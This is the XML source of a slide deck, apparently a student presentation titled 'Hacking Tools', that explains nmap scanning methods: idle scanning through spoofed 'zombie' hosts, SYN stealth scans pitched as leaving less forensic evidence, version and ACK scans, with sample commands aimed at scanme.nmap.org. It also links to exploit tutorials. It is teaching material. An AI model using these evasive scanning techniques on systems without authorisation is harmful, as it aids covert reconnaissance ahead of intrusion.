                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
              <a:defRPr b="1" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 6"/>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a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:defRPr sz="3000"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:defRPr sz="2400"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:defRPr sz="2400"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:defRPr sz="1800"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:defRPr sz="1800"/>
            </a:lvl5pPr>
            <a:lvl6pPr>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:defRPr sz="1800"/>
            </a:lvl6pPr>
            <a:lvl7pPr>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:defRPr sz="1800"/>
            </a:lvl7pPr>
            <a:lvl8pPr>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:defRPr sz="1800"/>
            </a:lvl8pPr>
            <a:lvl9pPr>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:defRPr sz="1800"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 7"/>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p>
            <a:pPr algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>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00.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.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0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0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0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0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0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0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0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0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7.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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2.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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3.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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2.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0.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4.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.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9.png"/><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1.png"/><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1.png"/><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9.png"/><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53.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.png"/><Relationship Id="rId8"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hyperlink" Target="http://www.samba.org/samba/news/symlink_attack.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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60.png"/><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65.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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6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6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7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7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7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8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7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8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8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8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hyperlink" Target="http://www.taqrimibadi.com/2013/04/exploit-metasploit-linux-kernel-26x.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://community.rapid7.com/docs/DOC-1875" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.computersecuritystudent.com/SECURITY_TOOLS/METASPLOITABLE/EXPLOIT/lesson2/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://nmap.org/nmap_doc.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 name="Shape 29"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Shape 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1583342"/>
            <a:ext cx="7772400" cy="1159799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hacking Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Shape 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2840053"/>
            <a:ext cx="7772400" cy="784799"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The Handsome Seastars</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x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Shape 8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Scanning Methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Shape 85"/>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i="1" lang="en"/>
              <a:t>IPID Idle Scanning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(-sI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Allows blind portscanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>No packets sent from your real IP!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Observes behavior of inactive zombie computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Impersonates → no direct interaction w/ target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Can sometimes bypass packet filters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Utilize different zombies, watch how target grants them different privileges</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id="90" name="Shape 9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Scanning Methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="Shape 91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="8229600" cy="3943499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2200"/>
              <a:t>IPID cont.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t>As long as OS does not randomize IPID (newer OSs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t>Simple network devices make good zombies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t>Nmap can parallelize, find some for you</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t>Send spoof SYN packet to target w/ zombie’s IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t>Open port: zombie receives SYN/ACK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t>Zombie sends RST (it never sent the SYN in the first place)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t>Zombie increments IPID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t>Attacker sends another packet to zombie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t>IPID incremented by 2?  Port open</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-368300" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200"/>
              <a:t>IPID incremented by 1?  Port closed</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sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="Shape 96"/>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IPID Idle Scanning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="Shape 97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="8229600" cy="3943499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="98" name="Shape 98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1343100"/>
            <a:ext cx="4343400" cy="3657600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="99" name="Shape 99"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4679775" y="1343100"/>
            <a:ext cx="4343400" cy="3657600"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Shape 104"/>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30200" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600"/>
              <a:t>nmap -v (ip address)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>We can use this command to find out more information about the address we targeted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>Basic scans yield results such as open</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>	ports and if the host is up</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Shape 105"/>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Scanning scanme.nmap.org</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="106" name="Shape 106"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4646177" y="2013075"/>
            <a:ext cx="4040625" cy="2840199"/>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30200" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>We can use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600"/>
              <a:t>nmap -sS (ip address)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>This will return filtered ports and is stealthier than regular scanning, it leaves behind less cyber forensic evidence using SYN packets.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Shape 112"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="342753"/>
            <a:ext cx="8229600" cy="857400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3800"/>
              <a:t>Stealth Scanning scanme.nmap.org</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="113" name="Shape 113"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2425712" y="3530912"/>
            <a:ext cx="6524625" cy="1114425"/>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rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>nmap -sV (ipaddress)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We can see the service and version of every port we scan, excluding closed ports</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Shape 119"/>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sz="3000"/>
              <a:t>Service/Version Scanning scanme.nmap.org</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="120" name="Shape 120"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="3245762"/>
            <a:ext cx="6248400" cy="1628775"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="Shape 125"/>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rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>nmap -sA (ipaddress)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ACK Scanning will never return or find ports, it only returns the unflitered/filtered state of a port</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="Shape 126"/>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ACK Scanning scanme.nmap.org</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="127" name="Shape 127"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2171700" y="3931562"/>
            <a:ext cx="6515100" cy="942975"/>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419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Why All Port scanning is terrible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>adding the --allports to code scans TCP port 9100 because printers operate here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
